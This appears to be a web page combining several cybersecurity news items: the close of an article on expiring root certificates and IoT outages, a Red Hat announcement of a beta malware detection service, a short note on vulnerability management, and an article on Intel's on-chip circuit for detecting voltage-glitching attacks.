Still, Helme wrote in a blog post 10 days before the expiration, "I'm betting a few things will probably break on that day." He was right. Some services from Cisco, Google, Palo Alto, QuickBooks, Fortinet, Auth0, and many more companies failed.

"And the weird thing about that," Helme tells Dark Reading, "is that the places using Let's Encrypt are by definition very modern — you can't just go to their website and pay your $10 and download your certificate by hand. It has to be done by a machine or via their API. These users were advanced, and it was still a really big problem. So what happens when we see \[expirations\] from the more legacy CAs that have these big enterprise customers? Surely the knock-on effect will be larger."

**The Path Forward**

But with some changes, that knock-on effect doesn't have to happen, says Venafi's Bocek, who views the challenge as one of knowledge and chain of command — so he sees solutions in both awareness and early collaboration.

"I'm really excited when I see chief security officers and their teams getting involved on the manufacturer and developer level," Bocek says. "The question is not just, 'Can we develop something that is safe?' but 'Can we continue to operate it?' There's often a shared responsibility of operation on these high-value connected devices, so we need to be clear on how we're going to handle that as a business."

Similar conversations are happening in the infrastructure sector, says Marty Edwards, deputy CTO for operational technology and IoT at Tenable. He's an industrial engineer by trade who has worked with utility companies and the US Department of Homeland Security.

"Quite frankly, in the industrial space with utilities and factories, any event that leads to a production outage or loss is concerning," Edwards says. "So in these specialty circles the engineers and developers are certainly looking at the impacts \[of expiring root certificates\] and how we can fix them."

Though Edwards stresses he's "optimistic" about those conversations and the push for cybersecurity considerations during the procurement process, he believes more regulatory oversight is also needed.

"Something like a baseline standard of care that perhaps includes language on how to maintain the integrity of a certificate system," Edwards says. "There's been discussions between various standards groups and governments about traceability for mission-critical devices, for example."

As for Helme, he'd love to see enterprise machines set for updates in a way that's realistic and not arduous for the user or the manufacturer — a new certificate issued and update downloaded every five years, perhaps. But manufacturers won't be incentivized to do that unless enterprise customers push for it, he notes.

"In general, I do think that this is something the industry needs to fix," Edwards agrees. "The good news is most of these challenges aren't necessarily technological. It's more about knowing how it all works, and getting the right people and procedures in place."

Expiring Root Certificates Threaten IoT in the Enterprise

The beta of Red Hat Insights malware detection service is now available.

The beta of **Red Hat Insights** malware detection service is now available. The malware detection service is a monitoring and assessment tool that scans **Red Hat Enterprise Linux** (RHEL) systems for the presence of malware, utilizing over 175 signatures of known Linux malware provided in partnership with the IBM X-Force Threat Intelligence team. The Red Hat Insights analysis provides:

*   The list of signatures scanned against your RHEL systems, with links to reference information and analysis reports
    
*   Results for individual system scans and aggregated results for all of your RHEL systems
    

To scan your Red Hat Insights systems for potential malware, follow our getting started guide. After your first full scan, you can view the results in the beta version of Insights malware detection. 

**Please note**: Due to the potentially sensitive nature of this information, only Organizational Admins have default access to the results. All other users must first be given access to the service, as detailed in section 2.2. of the Insights malware detection guide.

We hope you don’t see a screen like the one below, but if signature matches are found on your systems, you will see details about the signatures, the number of systems that were matched and details about where on the system the matches were found.

Like the other Insights services, malware detection is included in your RHEL subscription. Malware detection supports RHEL 7 Server / Workstation and RHEL 8 and 9 hosts.

Any feedback about the new malware detection service can be sent to us using the Feedback button inside of Insights — you can see it in the above screenshot on the lower right hand side of the page. Please give the Insights malware detection service a try soon!

Shane McDowell is a Principal Product Manager for Red Hat. He is focused on helping customers manage their infrastructure in the hybrid cloud. He brings 20+ years of experience with delivering and supporting technology solutions to users in a variety of industries, including Information Technology, Talent Acquisition and Residential Management.

Read full bio

Getting started with Red Hat Insights malware detection

DeepSurface’s Tim Morgan explains how network complexity and cloud computing have contributed to the challenge, and how automation can help.

Vulnerability management has changed dramatically in recent years, thanks to greater volume of risks. DeepSurface’s Tim Morgan explains how network complexity and cloud computing have contributed to this challenge, and how automation can help. Morgan parses automation, artificial intelligence, and machine learning, plus a few tips on how to cut through the hype. He also offers advice on how CISOs can better communicate about risk with their boards.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

DeepSurface Adds Risk-Based Approach to Vulnerability Management

The countermeasure, which compares the time and voltage at which circuits are activated, is being implemented in 12th Gen Intel Core processors.

Intel has developed and incorporated a circuit into its latest line of PC chips that can detect when attackers are using motherboard exploits to extract information from PC devices.

The "tunable replica circuit" on the latest Intel chips can detect attempts to glitch systems through voltage, clock, or electromagnetic techniques, Intel said during Black Hat. Attackers use these techniques to insert their own firmware and take control of the device.

"Every semiconductor ever produced is vulnerable to these attacks. The question is, how easy is it to exploit? We've just made it a lot harder to exploit because we detect these attacks," says Daniel Nemiroff, senior principal engineer at Intel.

The circuit is being implemented in Alder Lake, the 12th Gen Intel Core processors, which are used in laptops. Servers may get this technology at a later date, Nemiroff says.

**The Circuit's Inner Workings**

Typically, when a computer turns on, the silicon's power management controller waits for the voltage to ramp to a certain value before it starts activating components. For example, the power management controller activates the security engine, the USB controller, and other circuits when they reach their voltage values.

Under normal operations, once the microcontrollers activate, the security engine loads its firmware. In this motherboard hack, attackers attempt to trigger an error condition by lowering the voltage. The resulting glitch gives attackers the opportunity to load malicious firmware, which provides full access to information such as biometric data stored in trusted platform module circuits.

The tunable replica circuit protects systems against such attacks. Nemiroff describes the circuit as a countermeasure to prevent the hardware attack by matching the time and corresponding voltage at which circuits on a motherboard are activated. If the values don't match, the circuit detects an attack and generates an error, which will cause the chip's security layer to activate a failsafe and go through a reset.

"The only reason that could be different is because someone had slowed down the data line so much that it was an attack," Nemiroff says.

Such attacks are challenging to execute because attackers need to get access to the motherboard and attach components, such as voltage regulators, to execute the hack. The attackers will also need to know the exact time at which to mount a voltage glitch and what voltage they should drive to the pin.

"It's practical in the sense that if someone has stolen your machine from a taxi \[and\] brings it to their lab, they've got all the time in the world to open the laptop and then solder the right voltage generator lines to the machine itself," Nemiroff said.

That is the reason why the circuit is currently being integrated into chips used for laptops and not servers and desktops. Servers and desktops are not as portable and, thus, harder to steal, Nemiroff says.

**Deploying Countermeasures**

While no evidence of a motherboard exploit used in this manner exists, defenses need to be incorporated now, before attacks become widespread.

"There's no recorded exploit of an Intel PC system using these attacks, but there are various examples of other devices that have been attacked that are more interesting, like discrete TPMs and smart cards," Nemiroff says.

Glitching the security of a system isn't novel; it has existed in pay TV and smart cards for more than two decades, said Dmitry Nedospasov, who runs hardware security services provider Toothless Consulting and Advanced Security Training, which provides information security training.

Intel is adding system countermeasures to its platform controller hub, not its CPU. It's not clear to what extent the countermeasure implemented in the controller hub would be capable of protecting the system.

"The threat model is not clear and so is the reason why this mitigation is required," Nedospasov said.

As to the effectiveness of the circuit, it will be hard to verify whether it works without some kind of peer review, Nedospasov said.

"It's not clear what will and will not work in practice," Nedospasov said.

A lot of the patents on hardware countermeasures for chips were created in the 1990s and early 2000s, many of which came from pay TV.

"What this also means is that the 20-year patent periods have already expired or are expiring in the coming years. Many in the industry believe that we can expect more and more hardware countermeasures as manufacturers will no longer have to license the patents to implement these protections," Nedospasov said.

It is possible customers are putting pressure on Intel to shore up its on-chip security mechanisms, Nedospasov said.

"The bar is being raised and people are running out of software and firmware attacks, but they are going to come at us with hardware attacks. We figure this is the right time to deploy those kinds of countermeasures," Nemiroff said.

Tag

#intel